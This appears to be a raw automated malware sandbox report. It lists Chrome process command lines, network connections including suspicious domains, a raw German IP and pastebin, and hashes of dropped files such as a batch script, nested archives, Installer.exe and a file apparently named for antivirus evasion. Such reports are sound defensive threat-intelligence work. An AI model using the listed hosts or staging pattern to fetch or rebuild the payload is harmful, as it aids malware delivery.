"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2052 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2852 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2860 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5272 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3032 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4592 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6084 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4768 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4484 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4604 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5496 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Users\Admin\Downloads\7z2407-x64.exe
"C:\Users\Admin\Downloads\7z2407-x64.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2388 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4548 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4896 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6132 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5424 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2992 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x27c
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6452 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6596 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6716 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | completedhallweow.xyz | udp |
| US | 8.8.8.8:53 | bouncedgowp.shop | udp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| US | 8.8.8.8:53 | 198.93.21.104.in-addr.arpa | udp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| US | 8.8.8.8:53 | 81.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 172.217.16.238:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.200.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| GB | 142.250.200.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | www.7-zip.org | udp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| US | 8.8.8.8:53 | 237.202.12.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.35:443 | id.google.com | tcp |
| GB | 172.217.169.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.213.58.216.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | www.youtube.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.201.102:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| GB | 216.58.212.234:443 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| GB | 172.217.169.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 102.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| GB | 142.250.187.206:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 142.250.187.206:443 | encrypted-vtbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | rr2---sn-aigzrnz7.googlevideo.com | udp |
| GB | 74.125.175.199:443 | rr2---sn-aigzrnz7.googlevideo.com | tcp |
| GB | 74.125.175.199:443 | rr2---sn-aigzrnz7.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.175.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.102.84:443 | accounts.google.com | tcp |
| NL | 142.250.102.84:443 | accounts.google.com | tcp |
| NL | 142.250.102.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-5hneknes.googlevideo.com | udp |
| NL | 74.125.8.202:443 | rr5---sn-5hneknes.googlevideo.com | udp |
| GB | 142.250.200.10:443 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 142.250.187.193:443 | yt3.ggpht.com | tcp |
| GB | 142.250.187.193:443 | yt3.ggpht.com | tcp |
| GB | 142.250.187.193:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | 84.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.8.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i9.ytimg.com | udp |
| GB | 216.58.204.78:443 | i9.ytimg.com | tcp |
| US | 8.8.8.8:53 | 193.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 216.58.201.110:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| GB | 216.58.201.110:443 | consent.youtube.com | tcp |
| GB | 74.125.175.199:443 | rr2---sn-aigzrnz7.googlevideo.com | udp |
| NL | 52.142.223.178:80 | | tcp |
| GB | 216.58.201.102:443 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | 84.162.74.23.in-addr.arpa | udp |
| GB | 216.58.201.110:443 | consent.youtube.com | udp |
| GB | 142.250.187.193:443 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | tinyurl.com | udp |
| US | 104.17.112.233:443 | tinyurl.com | tcp |
| US | 104.17.112.233:443 | tinyurl.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 92.123.143.169:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.114.74:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | 233.112.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| GB | 142.250.200.42:443 | ajax.googleapis.com | tcp |
| US | 104.16.113.74:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| GB | 18.154.84.20:443 | cdn.amplitude.com | tcp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 8.8.8.8:53 | 74.114.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.113.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.84.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.39.156.108.in-addr.arpa | udp |
| US | 54.203.54.100:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| IT | 157.240.203.2:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| GB | 172.217.169.78:443 | translate.google.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 172.217.16.227:443 | www.google.co.uk | tcp |
| BE | 74.125.71.157:443 | stats.g.doubleclick.net | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| IT | 157.240.203.2:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| BE | 74.125.71.157:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 100.54.203.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.203.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.71.125.74.in-addr.arpa | udp |
| GB | 172.217.16.227:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| IT | 157.240.203.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 35.203.240.157.in-addr.arpa | udp |
| GB | 142.250.200.42:443 | | udp |
Files
memory/5104-5-0x00000000012D0000-0x0000000001326000-memory.dmp
memory/5104-8-0x00000000012D0000-0x0000000001326000-memory.dmp
memory/4180-7-0x00007FF7E0330000-0x00007FF7E0E5D000-memory.dmp
memory/5104-10-0x00000000012D0000-0x0000000001326000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
| MD5 | b2e6a3d0bf3320b759c464ae6fa5b735 |
| SHA1 | cc9f5de7742b9c11f7c0c0e3f9d39b0c16b38cc1 |
| SHA256 | 771b76ba28496c56d1d9c0fe67fdf7688a2f1b12a9eb428050551338945337a3 |
| SHA512 | bf2f09aebf6d4b07ec06ce37617361e149b26d7fc2f5c0715a5e479747eb5b1f8fc615c90d1e4d8d751e05dd566819facfef8a00cfb7acb61ec588b0c23b022a |
memory/5104-15-0x00000000012D0000-0x0000000001326000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 893874465a8d9f68f0684fd61e9f1d3c |
| SHA1 | 866a58255ebab05d4ee2f2ed8383a6555ac1df03 |
| SHA256 | e0855b82ec99b14bdfa38dacf90dadb2071e0d413c6559c752e0b2c6e8cd08c0 |
| SHA512 | 1cc878a3236a5ce4f3a89fae580b4d16a7842fd03dfe0a2c7d1d5da5be822528ea3826f659a70de727c9307fb15997f56b7204582043dc7efcc6c818f7aa2bd7 |
C:\Users\Admin\AppData\Local\Temp\main\file.bin
| MD5 | 716459a6ceac7d310d4227ea3e9ddb59 |
| SHA1 | fa27addf18c197bf5fc054bfb5ae57de1caf3382 |
| SHA256 | ba5270891d3eef832fe34f9d67fbbb30ceb3873552ea859139914a6a783b0aa1 |
| SHA512 | 3857cc099edd99f1c20d4c4456ec4577478afcbdb6073852c6df10775a4e6de0316ab68c6dacb7212d27f49057312ba1aeb0c35e695d84832f3e9f8d61f7d8c1 |
\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip
| MD5 | a62944686498212b290eae637729a151 |
| SHA1 | 2053660850d3f578f7b31e5ced16069d6f9c4ee0 |
| SHA256 | 0bb07f0caab7e5539e7efeca5bee359d9f6b49237e0c908981d9168680fe2b3e |
| SHA512 | ae6abd482552445cbf8c308948519227b0d1a82c1b3adb4800f8c9ac32c519c8d0aee8f3b4caada26d1976b63b032aad72d95e574adf205b947dada23a5b8ad3 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip
| MD5 | 870a5535c79edcf782551514f48d89ab |
| SHA1 | 333d814d65753cdc4c4e8fb587c09af6960110d1 |
| SHA256 | 814a92267e0d8867932afd625f2f8e55b04b88b2cfc31e91b6e45e473f1b057d |
| SHA512 | f8743ca2f1ef2433b41adc41adf6a5836c1901bda70d5d76301cb06b471796b360544efa591c49b3a7d09eee12cef7ba20e79571f50d891d4729598210772b06 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip
| MD5 | 6f7f4f7ed739e3ac5eee8d0876ff76d4 |
| SHA1 | 9a65d52885624dc47f342b5a9875d7720540c755 |
| SHA256 | b61a321a8a1f4ca1d8c52a1ad0464ac5882073ac8da7c5585f04ce2330b78acc |
| SHA512 | 35cad901c3f77c58803372a2f230701469d99fb9d8b16d82b59416a62d215614ab044dcae123473cc5d9a4a09e23f2edaac53ef82bbd5b3556b9b187cff50021 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip
| MD5 | 4a5f569872c858ede1c0c67500cfdd6d |
| SHA1 | cdcac69d89b45a7903198467c2d2d32126c31661 |
| SHA256 | 88b2d9a82c911ad61f3570aa31b360ae1649b117f6495459698d724f0c9638dc |
| SHA512 | d9c6776829def517a253e9c60d0316dbc03092f850383305089dc1110b1abd19668ae47dca8188e96c6f12b66a8e5b5a783901f2115cadd5c1accf019c3bdb40 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
| MD5 | a915fd2a4e2750ee9003e628294bf284 |
| SHA1 | f9adc1e65fc3d2cf39b2c5a89030f3225e21616d |
| SHA256 | 5e2e339dbee22d6c05d652646071bc81ad96a6422eb311453ca3905e7dfea285 |
| SHA512 | 044d5370ec915fb488cf77c1b181f5a4f89833028266f922766b782ff445f61ab85b92980d6939d0e252a368eb846def27bcdea7f029999d6854a90c793b3a5f |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
| MD5 | 18f4fe969c4ba0517b403e28f7ad2b72 |
| SHA1 | 9df09751ee1246db2ed6b6ed6fec87fb0891e077 |
| SHA256 | 06d1004f28a87b42b1d7ac23ff2e4b43d736295abc2e84740504386f40a041f4 |
| SHA512 | 9847b8e2b849b09a76e22ab0d76a1a7d29079676dbdf4277b712709af0ac6a6f0e3a473f144f0a8e247861111357027a758b95e4d096d24cec160192c5da32a4 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe
| MD5 | 4265bf9f9535ebb4e1830e2a50589285 |
| SHA1 | ddc45fe277a3b39179dd9e39e17d71b50a184607 |
| SHA256 | c07698b4c960b60d8a3c661887d6cc1f7fe74e31a24d4c2ae95d52d1c92ce403 |
| SHA512 | 3a7a0a8a6b82d5e1b6c06c12250eb9b347ed024811467d6da5123f6d07a79836a4e414758cb5c708d0c96cc4a020f8743b2c1e4fa5f5ed448fc087772ab592be |
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
| MD5 | 6dd7f70cddc4310e047032d70550f72c |
| SHA1 | e93c0d3a03dbe51eba117ea8e10bd0e8b6b27562 |
| SHA256 | e92508881b6d69c45897a58b4c7dc58ee68e438979604d7f7b6f6ff71f15444d |
| SHA512 | 1e6398a9739f57a3cf754a6e73f92cf67fe117440a6afe698767c578f396a4b8dab93b5568d02fa23fbcd3565b9017254625d58b1ea7a375c8537f2bab90f42c |
memory/868-77-0x0000000000240000-0x000000000024C000-memory.dmp
memory/868-78-0x0000000005040000-0x000000000553E000-memory.dmp
memory/868-79-0x0000000004A90000-0x0000000004B22000-memory.dmp
memory/868-80-0x0000000004C10000-0x0000000004C1A000-memory.dmp
memory/868-81-0x0000000004CB0000-0x0000000004D16000-memory.dmp
memory/1192-84-0x0000000004970000-0x00000000049A6000-memory.dmp
memory/1192-85-0x00000000074E0000-0x0000000007B08000-memory.dmp
memory/1192-86-0x00000000073E0000-0x0000000007402000-memory.dmp
memory/1192-87-0x0000000007CF0000-0x0000000007D56000-memory.dmp
memory/1192-88-0x0000000007DD0000-0x0000000008120000-memory.dmp
memory/1192-89-0x0000000007BD0000-0x0000000007BEC000-memory.dmp
memory/1192-90-0x0000000008520000-0x000000000856B000-memory.dmp
memory/1192-91-0x00000000085F0000-0x0000000008666000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybfkvbxl.3bg.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1192-108-0x00000000095B0000-0x00000000095E3000-memory.dmp
memory/1192-109-0x000000006F740000-0x000000006F78B000-memory.dmp
memory/1192-110-0x0000000009350000-0x000000000936E000-memory.dmp
memory/1192-115-0x0000000009790000-0x0000000009835000-memory.dmp
memory/1192-116-0x00000000098E0000-0x0000000009974000-memory.dmp
memory/1192-312-0x0000000009840000-0x000000000985A000-memory.dmp
memory/1192-317-0x0000000009670000-0x0000000009678000-memory.dmp
\??\pipe\crashpad_4332_UOQZPMJYURYHESBT
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001
| MD5 | 151fb811968eaf8efb840908b89dc9d4 |
| SHA1 | 7ec811009fd9b0e6d92d12d78b002275f2f1bee1 |
